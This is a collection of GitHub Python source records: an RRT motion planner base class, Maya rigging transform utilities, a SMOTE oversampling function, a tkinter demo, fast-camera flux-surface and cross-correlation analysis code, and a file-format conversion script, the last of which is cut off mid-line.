{"seq_id":"74271097192","text":"# This code is distributed WITHOUT ANY WARRANTY, without the implied\n# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU Lesser General Public License for more details.\n \n# The license is distributed along with this repository or you can check\n# for more details.\n\n# Contributors: \n# marcos-pereira (https://github.com/marcos-pereira)\n\nfrom abc import ABC, abstractmethod\nimport numpy as np\nimport random\nfrom rtree import index\n\nclass RRTPlanner(ABC):\n    def __init__(self,\n                 x_init,\n                 x_goal,\n                 goal_radius,\n                 steer_delta,\n                 scene_map,\n                 max_num_nodes):\n        \"\"\" Return RRTPlanner object. These planners were implemented or are inspired by the\n        algorithms from the paper:\n        S. Karaman and E. Frazzoli, “Sampling-based algorithms for optimal motion planning,” \n        The International Journal of Robotics Research, vol. 30, no. 7, pp. 846–894, 2011, doi: 10.1177/0278364911406761.\n\n        Args:\n            x_init (tuple): the initial node configuration.\n            x_goal (tuple): the goal node configuration.\n            goal_radius (double): the radius of a ball around the goal to be considered\n            at the goal.\n            steer_delta (int): the step size in pixels when going from a node in the tree\n            towards a new sampled node.\n            scene_map (numpy matrix): the scene map where 0 indicates free space and 1 indicates obstacles.\n            max_num_nodes (int): the maximum number of nodes to run the planner.\n        \"\"\"\n        self.x_init_ = x_init\n        self.x_goal_ = x_goal\n        self.goal_radius_ = goal_radius\n        self.steer_delta_ = steer_delta\n        self.max_num_nodes_ = max_num_nodes\n        self.scene_map_ = scene_map\n\n        self.map_height_, self.map_width_ = self.scene_map_.shape\n        \n        # interleaved True: requires coordinates as [xmin ymin, xmax ymax]\n        # See: https://rtree.readthedocs.io/en/latest/class.html#rtree.index.Property\n        # index.Property: inherits some instantiation properties:\n        # See: https://rtree.readthedocs.io/en/latest/class.html#rtree.index.Property\n        self.nodes_ = index.Index(interleaved=True, properties=index.Property())\n\n        ## Used to get nearest neighbors using KDtree\n        self.nodes_list_ = list()\n        self.nodes_list_.append(self.x_init_)\n        \n        self.node_count_ = 1\n\n        self.edges_ = set()\n\n        ## Initialize costs map\n        self.node_to_cost_ = dict()\n        self.node_to_cost_[self.x_init_] = 0\n\n        ## Initialize parent map\n        self.node_to_parent_ = dict()\n        self.node_to_parent_[self.x_init_] = self.x_init_\n\n        ## Initialize graph\n        self.rrt_graph_ = (self.nodes_, self.edges_)\n        \n        x_init_id = 0\n        self.insert_node_to_tree(x_init, x_init_id)\n        \n        ## Used to detect collisions with obstacles\n        self.ones_in_drawing_ = np.where(self.scene_map_ == 1)\n        self.obstacles_coordinates_ = set(zip(self.ones_in_drawing_[1], self.ones_in_drawing_[0]))\n        \n        ## Initialize path to goal empty\n        self.path_ = list()\n        \n        ## New point to add to tree\n        self.x_new_ = tuple()\n        \n        ## 
Store if path was found\n        self.path_found_ = False\n        \n    @abstractmethod\n    def plan_found(self):\n        \"\"\"Return if the plan is found.\n        \"\"\"\n        pass\n    \n    @abstractmethod\n    def run(self):\n        \"\"\"Run the planner until the path to goal is found.\n        \"\"\"\n        pass\n    \n    @abstractmethod\n    def run_step(self):\n        \"\"\"Run only one step of the planner.\n        \"\"\"\n        pass\n    \n    def run_test(self):\n        \"\"\" Run the planner on the loaded map with no visualization.\n        \"\"\"\n        path_found = False\n        while True:\n            # Run one planner step, then test the newest node against the goal\n            self.run_step()\n            \n            path_found = self.path_to_goal_found(self.x_new_, self.x_goal_, self.goal_radius_)\n            \n            if self.max_number_nodes() == True:\n                break\n            \n            if path_found == True:\n                print(\"Path to goal found!\")\n                break\n    \n    def path_to_goal_found(self, x_new, x_goal, goal_radius):\n        \"\"\" Returns if the path to goal was found.\n\n        Args:\n            x_new (tuple): is the new node added to the tree.\n            x_goal (tuple): is the goal node in the map.\n            goal_radius (double): is the radius that considers the\n            goal node was reached.\n\n        Returns:\n            bool: True if the path was found, False otherwise.\n        \"\"\"\n        path_found = False\n        \n        ## Check if goal radius was reached\n        if self.nodes_distance(x_new, x_goal) < goal_radius:\n            print(\"Goal node radius reached!\")    \n            \n            path_found = True\n            \n        return path_found\n    \n    def max_number_nodes(self):\n        \"\"\" Check if maximum number of nodes was reached.\n\n        Returns:\n            bool: True if maximum number of nodes was reached.\n        \"\"\"\n        \n        max_number_nodes_reached = False\n        \n        if self.node_count_ >= self.max_num_nodes_:\n            print(\"Maximum number of nodes in tree reached!\")\n            print(\"Input anything and press enter to quit.\")\n            max_number_nodes_reached = True\n            \n            return max_number_nodes_reached\n        else:\n            return max_number_nodes_reached\n    \n    def sample_space(self, x_max, y_max):\n        \"\"\" Sample the configuration space with limits x_max and y_max.\n\n        Args:\n            x_max (int): the maximum x coordinate.\n            y_max (int): the maximum y coordinate.\n\n        Returns:\n            tuple: the sampled tuple configuration.\n        \"\"\"\n        x = random.randint(0, x_max)\n        y = random.randint(0, y_max)\n\n        x_rand = (x, y)\n\n        return x_rand\n    \n    def nodes_distance(self, node1, node2):\n        \"\"\" Returns the distance between node1 and node2.\n\n        Args:\n            node1 (tuple): the first node.\n            node2 (tuple): the second node.\n\n        Returns:\n            double: the norm of the vector between node2 and node1.\n        \"\"\"\n        p1 = np.array([node1[0], node1[1]])\n        p2 = np.array([node2[0], node2[1]])\n        distance = np.linalg.norm(p1 - p2)\n\n        return distance\n    \n    def steer(self, node1, node2, delta):\n        \"\"\" Returns a node between node1 and node2. If they are close by delta, then \n        return node2.\n\n        Args:\n            node1 (tuple): the initial node.\n            node2 (tuple): the goal node towards which we steer.\n            delta (double): the minimum distance to consider already near enough to node2.\n\n        Returns:\n            tuple: the new node between node1 and node2. 
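For\n            example, with delta=4, steering from (0, 0) toward (10, 0) steps 4\n            pixels along the unit vector and returns (4, 0), while steering\n            from (0, 0) toward (2, 0) returns (2, 0) since the nodes are\n            already within delta.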
\n        \"\"\"\n        node1 = np.array([node1[0], node1[1]])\n        node2 = np.array([node2[0], node2[1]])\n        if self.nodes_distance(node1, node2) < delta:\n            node = node2\n        else:\n            diffnodes = node2 - node1\n            diffnodes = diffnodes/self.nodes_distance(node1, node2)\n            node = node1 + delta*diffnodes\n\n        # Convert to int, otherwise the maps will not work with double precision\n        # TODO: use some better mapping like a hash function to avoid this problem\n        node = tuple(int(element) for element in node)\n\n        return node\n\n    def linear_interpolation(self, node1, node2, delta):\n        \"\"\"Do a linear interpolation between node1 and node2\n        using the interpolation factor delta if no collision occurs\n        between node1 and node2.\n\n        Args:\n            node1 (tuple): the source node.\n            node2 (tuple): the destination node.\n            delta (double): the interpolation factor that must be in the interval [0,1].\n\n        Returns:\n            tuple: the last node of the interpolation, or False if a collision\n            occurs along the segment.\n        \"\"\"\n        \n        node1 = np.array([node1[0], node1[1]])\n        node2 = np.array([node2[0], node2[1]])\n\n        for interpolation_factor in np.arange(0, 1, delta):\n            node = node1*interpolation_factor + (1-interpolation_factor)*node2\n            node = tuple(element for element in node)    \n            if self.collision(node) == True:\n                return False    \n        \n        # Convert to int, otherwise the maps will not work with double precision\n        # TODO: use some better mapping like a hash function to avoid this problem\n        node = tuple(int(element) for element in node)\n        \n        return node\n    \n    def path(self, node):\n        \"\"\" Get path from node to initial node using the map node_to_parent. \n        Return also the path cost.\n\n        Returns:\n            list: the nodes from the given node back to the initial node.\n            double: path cost.\n        \"\"\"\n\n        ## Current node starts as the last node of the trajectory\n        current_node = node\n        \n        path = list()\n\n        while True:\n            ## Add tuple of current node to the path\n            path.append(current_node)\n\n            ## Current node becomes its parent, we are searching for a path\n            ## backwards in the tree\n            current_node = self.node_to_parent_[current_node]\n\n            ## If x_init is reached\n            if current_node[0] == self.x_init_[0] and \\\n                current_node[1] == self.x_init_[1]:\n                break\n        \n        path_cost = self.cost_to_node(node)\n\n        return path, path_cost\n    \n    def nearest_node(self, current_node, rrt_graph):\n        \"\"\" Get nearest node to current node in the rrt_graph.\n\n        Args:\n            current_node (tuple): the current node.\n            rrt_graph (rtree index): the rrt graph.\n\n        Returns:\n            tuple: the nearest node to current_node.\n        \"\"\"\n        \n        # Number of nearest neighbors to query\n        num_nearest_neighbors = 1\n        \n        # The raw object is the node itself as it was inserted in the rtree\n        return_raw_object_from_rtree = \"raw\"\n        \n        # Get the nearest node (the first element of the rrt_graph is the node tree)\n        nearest_node_pair = rrt_graph[0].nearest(current_node, num_results=num_nearest_neighbors, objects=return_raw_object_from_rtree)\n        nearest_node_pair_as_list = list(nearest_node_pair)\n        \n        return nearest_node_pair_as_list[0]\n\n    def configuration_in_free_space(self):\n        \"\"\"Get a configuration in the free configuration space.\n\n        Returns:\n            tuple: the configuration in the configuration free space.\n        \"\"\"\n        ## Sample configuration in space\n        x_rand = self.sample_space(self.map_width_, self.map_height_)\n        \n        # Sample until no collision occurs\n        while x_rand in self.obstacles_coordinates_:\n            x_rand = self.sample_space(self.map_width_, self.map_height_)\n        \n        return x_rand\n    \n    def cost_to_node(self, node):    \n        \"\"\" Return the cost from initial node in the tree to the 
node.\n\n        Args:\n            node (tuple): the node to be added to tree.\n\n        Returns:\n            double: the cost from initial node in the tree to the node.\n        \"\"\"\n        parent_node = self.node_to_parent_[node]\n        cost_to_parent = self.node_to_cost_[parent_node]\n        cost_parent_to_node = self.nodes_distance(parent_node, node)\n        cost = cost_to_parent + cost_parent_to_node\n        \n        return cost\n\n    def collision(self, node):\n        \"\"\" Check if node is in collision. First the node is converted to integers\n        because the configuration space is discretized into integers.\n\n        Args:\n            node (tuple): The node to check if collides with obstacles.\n\n        Returns:\n            bool: True if in collision, false otherwise.\n        \"\"\"\n        node_integers = tuple(int(element) for element in node)\n        if node_integers in self.obstacles_coordinates_:\n            return True\n        else:\n            return False\n    \n    def insert_node_to_tree(self, node, node_id=0):\n        \"\"\" Insert node to rrt_tree node tree.\n\n        Args:\n            node (tuple): the node to be inserted to the rrt_tree node tree.\n            node_id (int): the id of the inserted node.\n        \"\"\"\n        \n        # The rtree requires the doubled coordinates of the object to be stored\n        # See the insert documentation: https://rtree.readthedocs.io/en/latest/class.html#rtree.index.Property\n        node_coordinates_doubled = node + node\n        \n        # The first element of the rrt_graph is the node tree\n        self.rrt_graph_[0].insert(node_id, node_coordinates_doubled, node)\n    \n    def add_edge(self, node1, node2):\n        \"\"\" Add edge from node 1 to node 2 in the rrt_graph.\n\n        Args:\n            node1 (tuple): The first node.\n            node2 (tuple): The second node.\n        \"\"\"\n        \n        # The second element of rrt_graph is the edge list\n        self.rrt_graph_[1].add((node1, node2))\n    \n    def get_graph(self):\n        \"\"\"Return the RRT graph.\n        \"\"\"\n        \n        return self.rrt_graph_","repo_name":"marcos-pereira/rrt-motion-planner","sub_path":"python-scripts/RRTPlanner.py","file_name":"RRTPlanner.py","file_ext":"py","file_size_in_byte":13197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"41026388961","text":"\nimport maya.OpenMaya as om\n\nimport maya.cmds as cmds\n\nfrom ooutdmaya.rigging.core.util import lib, names\n\n\ndef constraintTrsToClosest(srcTrsList, destTrsList):\n    \"\"\"\n    parent constrains the supplied source transforms (srcTrsList)\n    to the nearest transform in the supplied destination transforms (destTrsList)\n    \"\"\"\n    for transform in srcTrsList:\n        # get the closest transform for orient constraining\n        closestTrs = lib.closestTransform(transform, destTrsList)\n        cmds.parentConstraint(closestTrs, transform, mo=1)\n\n\ndef attachTransformsToCurve(curve, transformList, orientTrsList):\n    crvShape = cmds.listRelatives(curve, ad=1, type='nurbsCurve')[0]\n    crvShapeAttr = '{0}.create'.format(crvShape)\n    npoc = cmds.createNode('nearestPointOnCurve')\n    destAttr = '{0}.inputCurve'.format(npoc)\n    cmds.connectAttr(crvShapeAttr, destAttr, f=1)\n    cvi = cmds.createNode('curveInfo', n='{0}_CVI'.format(curve))\n    destAttr = '{0}.inputCurve'.format(cvi)\n    cmds.connectAttr(crvShapeAttr, destAttr, f=1)\n    arcLen = cmds.getAttr('{0}.arcLength'.format(cvi))\n    mdn = cmds.createNode('multiplyDivide', n='{0}_MDN'.format(curve))\n    cmds.setAttr('{0}.operation'.format(mdn), 2)\n    cmds.connectAttr('{0}.arcLength'.format(cvi), '{0}.input2X'.format(mdn))\n    cmds.setAttr('{0}.input1X'.format(mdn), arcLen)\n\n    for transform in transformList:\n        # get the closest transform for orient constraining\n        closestTrs = lib.closestTransform(transform, orientTrsList)\n        # closest point on curve 
info\n pci = cmds.createNode('pointOnCurveInfo', n='{0}_PCI'.format(transform.replace('_GRP', 'Grp')))\n cmds.setAttr('{0}.turnOnPercentage'.format(pci), 1)\n mdl = cmds.createNode('multDoubleLinear', n='{0}_MDL'.format(transform.replace('_GRP', 'Grp')))\n cmds.connectAttr('{0}.outputX'.format(mdn), '{0}.input1'.format(mdl))\n destAttr = '{0}.inputCurve'.format(pci)\n cmds.connectAttr(crvShapeAttr, destAttr, f=1)\n pos = cmds.xform(transform, q=1, ws=1, rp=1)\n # update nearest point on curve to get param\n cmds.setAttr('{0}.inPosition'.format(npoc), pos[0], pos[1], pos[2])\n param = cmds.getAttr('{0}.parameter'.format(npoc))\n cmds.setAttr('{0}.input2'.format(mdl), param)\n # cmds.setAttr('{0}.parameter'.format(pci), param)\n cmds.connectAttr('{0}.output'.format(mdl), '{0}.parameter'.format(pci))\n pciGrp = cmds.createNode('transform', n='{0}_GRP'.format(transform.replace('_GRP', 'GrpPci')))\n cmds.connectAttr('{0}.positionX'.format(pci), '{0}.tx'.format(pciGrp))\n cmds.connectAttr('{0}.positionY'.format(pci), '{0}.ty'.format(pciGrp))\n cmds.connectAttr('{0}.positionZ'.format(pci), '{0}.tz'.format(pciGrp))\n cmds.parent(pciGrp, cmds.listRelatives(transform, parent=1)[0])\n cmds.orientConstraint(closestTrs, pciGrp, mo=1)\n cmds.parentConstraint(pciGrp, transform, mo=1)\n cmds.delete(npoc)\n \ndef getDagPath(node=None):\n sel = om.MSelectionList()\n sel.add(node)\n d = om.MDagPath()\n sel.getDagPath(0, d)\n return d\n\ndef getLocalOffset(parent, child):\n parentWorldMatrix = getDagPath(parent).inclusiveMatrix()\n childWorldMatrix = getDagPath(child).inclusiveMatrix()\n return childWorldMatrix * parentWorldMatrix.inverse()\n \ndef matrixConstraint(master, slave, mode=\"create\", maintainOffset=False):\n \"\"\"Creates a matrix constraint between the master and slave targets\n \n TODO:\n [] Add offset\n [] Prep for joints\n [] Fix remove function (Do a proper check to find correct connections)\n \n Args:\n master (str): The driver target\n slave (str): The driven target\n \n \"\"\"\n if not cmds.pluginInfo('matrixNodes', q=1, l=1):\n try: cmds.loadPlugin('matrixNodes')\n except: raise RuntimeError('Unable to load the matrixNodes plugin!')\n \n if mode == \"create\" and not maintainOffset:\n mxMult = cmds.createNode(\"multMatrix\", n=names.addModifier(slave, 'multMatrix'))\n mxDecom = cmds.createNode(\"decomposeMatrix\", n=names.addModifier(slave, 'decomposeMatrix'))\n \n cmds.connectAttr(\"{0}.{1}\".format(master, \"worldMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[0]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(slave, \"parentInverseMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[1]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(mxMult, \"matrixSum\"), \"{0}.{1}\".format(mxDecom, \"inputMatrix\"), f=1)\n \n # output results on the slave transform\n # cmds.connectAttr(\"{0}.{1}\".format(mxDecom, \"outputTranslate\"), \"{0}.{1}\".format(slave, \"translate\"), f=1)\n # cmds.connectAttr(\"{0}.{1}\".format(mxDecom, \"outputRotate\"), \"{0}.{1}\".format(slave, \"rotate\"), f=1)\n # cmds.connectAttr(\"{0}.{1}\".format(mxDecom, \"outputScale\"), \"{0}.{1}\".format(slave, \"scale\"), f=1)\n for attr in ['x', 'y', 'z']:\n capAttr = attr.upper()\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputTranslate\", capAttr), \"{0}.{1}{2}\".format(slave, \"translate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputRotate\", capAttr), \"{0}.{1}{2}\".format(slave, \"rotate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputScale\", capAttr), 
\"{0}.{1}{2}\".format(slave, \"scale\", capAttr), f=1)\n cmds.connectAttr(\"{0}.outputShearX\".format(mxDecom), \"{0}.shearXY\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearY\".format(mxDecom), \"{0}.shearXZ\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearZ\".format(mxDecom), \"{0}.shearYZ\".format(slave), f=1)\n \n elif mode == \"create\" and maintainOffset:\n mxMult = cmds.createNode(\"multMatrix\", n=names.addModifier(slave, 'multMatrix'))\n mxDecom = cmds.createNode(\"decomposeMatrix\", n=names.addModifier(slave, 'decomposeMatrix'))\n # multiply\n # 0 - slave world matrix * master world inverse matrix \n # 1 - master world matrix\n # 2 - slave parent inverse matrix\n localOffset = getLocalOffset(master, slave)\n cmds.setAttr( \"{0}.{1}\".format(mxMult, \"matrixIn[0]\"), [localOffset(i, j) for i in range(4) for j in range(4)], type=\"matrix\")\n cmds.connectAttr(\"{0}.{1}\".format(master, \"worldMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[1]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(slave, \"parentInverseMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[2]\"), f=1)\n cmds.connectAttr(\"{0}.{1}\".format(mxMult, \"matrixSum\"), \"{0}.{1}\".format(mxDecom, \"inputMatrix\"), f=1)\n \n # output results on the slave transform\n for attr in ['x', 'y', 'z']:\n capAttr = attr.upper()\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputTranslate\", capAttr), \"{0}.{1}{2}\".format(slave, \"translate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputRotate\", capAttr), \"{0}.{1}{2}\".format(slave, \"rotate\", capAttr), f=1)\n cmds.connectAttr(\"{0}.{1}{2}\".format(mxDecom, \"outputScale\", capAttr), \"{0}.{1}{2}\".format(slave, \"scale\", capAttr), f=1)\n cmds.connectAttr(\"{0}.outputShearX\".format(mxDecom), \"{0}.shearXY\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearY\".format(mxDecom), \"{0}.shearXZ\".format(slave), f=1)\n cmds.connectAttr(\"{0}.outputShearZ\".format(mxDecom), \"{0}.shearYZ\".format(slave), f=1)\n \n # Crude accomodation for joint orient\n if cmds.objectType(slave) == 'joint':\n cmds.setAttr('{0}.jo'.format(slave), 0, 0, 0)\n\n elif mode == \"remove\":\n mxMult = \"\"\n mxDecom = \"\"\n \n outCon = cmds.listConnections(master, s=0)\n for i in outCon:\n if cmds.objectType(i) == \"multMatrix\":\n mxMult = i\n \n inCon = cmds.listConnections(slave, d=0)\n for i in inCon:\n if cmds.objectType(i) == \"decomposeMatrix\":\n mxDecom = i\n \n if mxMult and mxDecom:\n cmds.disconnectAttr(\"{0}.{1}\".format(master, \"worldMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[0]\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(slave, \"parentInverseMatrix\"), \"{0}.{1}\".format(mxMult, \"matrixIn[1]\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(mxMult, \"matrixSum\"), \"{0}.{1}\".format(mxDecom, \"inputMatrix\"))\n \n cmds.disconnectAttr(\"{0}.{1}\".format(mxDecom, \"outputTranslate\"), \"{0}.{1}\".format(slave, \"translate\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(mxDecom, \"outputRotate\"), \"{0}.{1}\".format(slave, \"rotate\"))\n cmds.disconnectAttr(\"{0}.{1}\".format(mxDecom, \"outputScale\"), \"{0}.{1}\".format(slave, \"scale\"))\n\n\ndef listAllParents(node):\n \"\"\"Recursively list all parent transforms\n \"\"\"\n retList = []\n parent = cmds.listRelatives(node, parent=1)\n if parent:\n retList = parent + listAllParents(parent[0])\n return 
retList\n","repo_name":"jimbo07/openBBlib","sub_path":"rigging_tools/core/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
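The matrixConstraint helper in the transform.py module just above drives the slave through a multMatrix → decomposeMatrix chain, and in maintainOffset mode seeds matrixIn[0] with getLocalOffset's childWorld × parentWorld⁻¹ product. The row-vector algebra behind that can be sanity-checked outside Maya; a small NumPy sketch in which the 4×4 matrices are made-up stand-ins for Maya's inclusiveMatrix values:

import numpy as np

def translation(tx, ty, tz):
    # Row-vector (Maya-style) convention: world = local @ parent.
    m = np.eye(4)
    m[3, :3] = (tx, ty, tz)
    return m

master_world = translation(1.0, 2.0, 0.0)   # driver worldMatrix at setup
slave_world = translation(4.0, 2.0, -1.0)   # driven worldMatrix at setup

# getLocalOffset(): the slave's world matrix expressed in the master's frame.
offset = slave_world @ np.linalg.inv(master_world)

# Move the master; the multMatrix chain recomputes offset @ masterWorld.
master_world = translation(6.0, 2.0, 0.0)
new_slave_world = offset @ master_world
print(new_slave_world[3, :3])  # -> [ 9.  2. -1.], original offset preserved

Because Maya composes matrices in row-vector order, offset @ master_world is exactly the matrixIn[0] * matrixIn[1] product the multMatrix node accumulates before decomposeMatrix splits the result back into translate/rotate/scale.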
{"seq_id":"74552689511","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom random import randrange, choice\nfrom sklearn.neighbors import NearestNeighbors\n\ndef SMOTE(T, N, k=5):\n \"\"\"\n Returns (N/100) * n_minority_samples synthetic minority samples.\n Parameters\n ----------\n T : array-like, shape = [n_minority_samples, n_features]\n Holds the minority samples\n N : percentage of new synthetic samples:\n n_synthetic_samples = N/100 * n_minority_samples. Can be < 100.\n k : int. Number of nearest neighbours.\n Returns\n -------\n S : Synthetic samples. array,\n shape = [(N/100) * n_minority_samples, n_features].\n \"\"\"\n n_minority_samples, n_features = T.shape\n\n if N < 100:\n print('if N is less than 100%, randomize the minority class samples as only a random percent of them will be SMOTEd.')\n idx_picked = np.random.choice(range(n_minority_samples), size=int(n_minority_samples*N/100), replace=False)\n T = T[idx_picked, :]\n n_minority_samples = T.shape[0]\n N = 100\n\n if (N % 100) != 0:\n raise ValueError(\"N must be < 100 or multiple of 100\")\n\n N = int(N/100)\n n_synthetic_samples = N * n_minority_samples\n S = np.zeros(shape=(n_synthetic_samples, n_features))\n\n kNN = NearestNeighbors(n_neighbors = k)\n kNN.fit(T)\n\n new_index = 0\n\n for i in range(n_minority_samples):\n nn = kNN.kneighbors(T[i].reshape(1, -1), return_distance=False)\n for n in range(N): # nn[0][0] is T[i] itself, so slice it off before sampling a neighbour\n nn_index = np.random.choice(nn[0][1:])\n for col_idx in range(n_features):\n dif = T[nn_index, col_idx] - T[i, col_idx]\n gap = np.random.uniform(low=0.0, high=1.0)\n '''gap: the original paper draws a new random number for every column (the synthetic sample lies in the \"cube\" defined by T[i] and its neighbour);\n many implementations reuse one random number for all columns (the synthetic sample lies on the \"segment\" between T[i] and its neighbour).\n '''\n S[new_index, col_idx] = T[i, col_idx] + gap * dif\n new_index += 1\n return S\n","repo_name":"thibaultlaugel/useful-macros","sub_path":"python/sampling/smote.py","file_name":"smote.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"259734946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 24 18:03:43 2018\n\n@author: anna\n\"\"\"\nfrom tkinter import Tk, Label, Entry, RIDGE, SUNKEN\n\nroot = Tk()\ncolours = ['red','green','purple','white','yellow','blue']\n\nr = 0\nfor c in colours:\n Label(root, text=c, relief=RIDGE,width=15).grid(row=r,column=0)\n Entry(root, bg=c, relief=SUNKEN,width=10).grid(row=r,column=1)\n r = r + 1\n\nroot.mainloop()\n","repo_name":"duyt1001/SciFair2018","sub_path":"tkinterwebpage.py","file_name":"tkinterwebpage.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17064587184","text":"import numpy as np\n\ndef get_camera_tangency_angle(calibration,R,Z):\n angs = np.linspace(0.0,360.0,361)\n\n def refine_angle(angles,start_angle=0.0,R=0.6,Z=-1.25):\n xind = 0\n current_ang = start_angle \n #R = 0.6\n #Z = -1.2 \n for ang in angles: \n X = R*np.cos(ang*2.0*np.pi/360.0)\n Y = R*np.sin(ang*2.0*np.pi/360.0)\n inds = calibration.ProjectPoints([X,Y,Z])\n #print(inds[0,0,0])\n if inds[0,0,0] > xind:\n xind = inds[0,0,0]\n current_ang = ang\n \n return current_ang\n ang = refine_angle(angs,R=R,Z=Z)\n #Second refinement\n angs = np.linspace(ang-10.0,ang+10.0,50)\n ang = refine_angle(angs,ang,R=R,Z=Z) \n #Third refinement\n angs = np.linspace(ang - 0.5,ang + 0.5,50)\n #plt.clf()\n return refine_angle(angs,ang,R=R,Z=Z)*2.0*np.pi/360.0\n \n\ndef project_flux_surface(calibration,tracer,psiN,Zrange=None,Rrange=None):\n \n tan_ang = get_camera_tangency_angle(calibration,0.6,-1.25)\n print(tan_ang)\n \n fline = tracer.trace(1.4,0.0,ds=1e-2,mxstep=10000,psiN=psiN)\n \n Z = np.asarray(fline.Z).squeeze()\n X = np.asarray(fline.R).squeeze()*np.cos(tan_ang)\n Y = np.asarray(fline.R).squeeze()*np.sin(tan_ang)\n print(psiN,fline.R[0],fline.R[-1])\n inds = None\n r = np.asarray(fline.R).squeeze()\n if Zrange is not None:\n zmin = Zrange[0]\n zmax = Zrange[1]\n inds = np.where(Z > zmin)[0]\n #print(inds)\t\n inds = inds[np.where(Z[inds] < zmax)[0]]\n #print(inds)\n Z = Z[inds]\n X = X[inds]\n Y = Y[inds]\n r = r[inds]\n if Rrange is not None:\n rmin = Rrange[0]\n rmax = Rrange[1]\n inds = np.where(r > rmin)[0]\n #print(inds)\n inds = inds[np.where(r[inds] < rmax)[0]]\n #print(inds)\n X = X[inds]\n Y = Y[inds]\n Z = Z[inds]\n\t\t\n objpoints = np.array([[X[i],Y[i],Z[i]] for i in np.arange(len(X))])\n \n return np.array(calibration.ProjectPoints(objpoints)[:,0,:]).squeeze(), r,Z\n \n \ndef cross_correlation(frames,coords=(0,0),delay=0):\n dims = frames[:].shape\n #frames = np.empty((dims[0]-abs(delay),dims[1],dims[2]))\n #Get pixel means and standard deviations\n\n frames_cor = frames - frames.mean(axis=0)\n frames_cor /= frames.std(axis=0)\n\n result = np.zeros((frames.shape[1],frames.shape[2]))\n if delay > 0:\n for x in np.arange(dims[1]):\n for y in np.arange(dims[2]):\n result[x,y] = np.mean(frames_cor[delay:,coords[0],coords[1]]*frames_cor[0:-delay,x,y])\n elif 
delay < 0:\n for x in np.arange(dims[1]):\n for y in np.arange(dims[2]):\n result[x,y] = np.mean(frames_cor[0:delay,coords[0],coords[1]]*frames_cor[-delay:,x,y])\n else:\n for x in np.arange(dims[1]):\n for y in np.arange(dims[2]):\n result[x,y] = np.mean(frames_cor[:,coords[0],coords[1]]*frames_cor[:,x,y])\n\n return result\n \n \ndef correlation_flow_map(frames,xstride=5,ystride=5,tstride=1,xref=None,yref=None):\n \n if xref is None:\n xref = np.arange(frames.shape[1])[:,np.newaxis]*np.ones(frames.shape[2])\n if yref is None:\n yref = np.arange(frames.shape[2])[np.newaxis,:]*np.ones(frames.shape[1])\n \n \n inds_x = np.arange(frames.shape[1])[::xstride]\n inds_y = np.arange(frames.shape[2])[::ystride]\n \n vx = np.zeros((inds_x.shape[0],inds_y.shape[0]))\n vy = np.zeros((inds_x.shape[0],inds_y.shape[0]))\n \n for i,x in enumerate(inds_x):\n for j,y in enumerate(inds_y):\n C_pp = cross_correlation(frames,(x,y),delay=tstride)\n try:\n inds_max = np.where(C_pp == C_pp.max())\n \n vx[i,j] = xref[x,y] - xref[inds_max[0],inds_max[1]] \n vy[i,j] = yref[x,y] - yref[inds_max[0],inds_max[1]] \n except:\n pass\n \n \n return vx, vy\n \n \n \n \n \n \n \n \n \n \n ","repo_name":"nick-walkden/pyFastcamTools","sub_path":"analysis/util_funcs.py","file_name":"util_funcs.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4078434560","text":"import os\nimport argparse\nimport h5py\nimport numpy as np\nimport sys\n\n\ndef convert_ht2(directory, file_base_name):\n \"\"\"convert the ht2 file to csv using picoquant. Picoquant has to be installed first\"\"\"\n\n os.system('picoquant -vi {in_file} -o {out_file}'.format(\n in_file=os.path.join(directory, file_base_name+'.ht2'),\n out_file=os.path.join(directory, file_base_name+'.csv')))\n\n\ndef convert_mat(directory, file_base_name):\n \"\"\"convert the matlab mat file to csv\"\"\"\n\n with h5py.File(os.path.join(directory, file_base_name+'.mat'), 'r') as file:\n\n sync = np.array(file['Sync'][:, 0], dtype=np.uint8)\n time = np.array(file['Time'][:, 0], dtype=np.uint64)\n\n sync = np.trim_zeros(sync)\n time = np.trim_zeros(time)\n\n np.savetxt(os.path.join(directory, file_base_name+'.csv'),\n np.transpose([sync, time]), fmt=['%d', '%d'], delimiter=',')\n\n print('saved {}'.format(os.path.join(directory, file_base_name+'.csv')))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Convert all ht2 in the specified folder recursively')\n\n parser.add_argument('path', metavar='path', type=str,\n help='base path for conversion',\n default='.')\n\n parser.add_argument('--format', metavar='-f', type=str, default='ht2',\n help='specify the input format. 
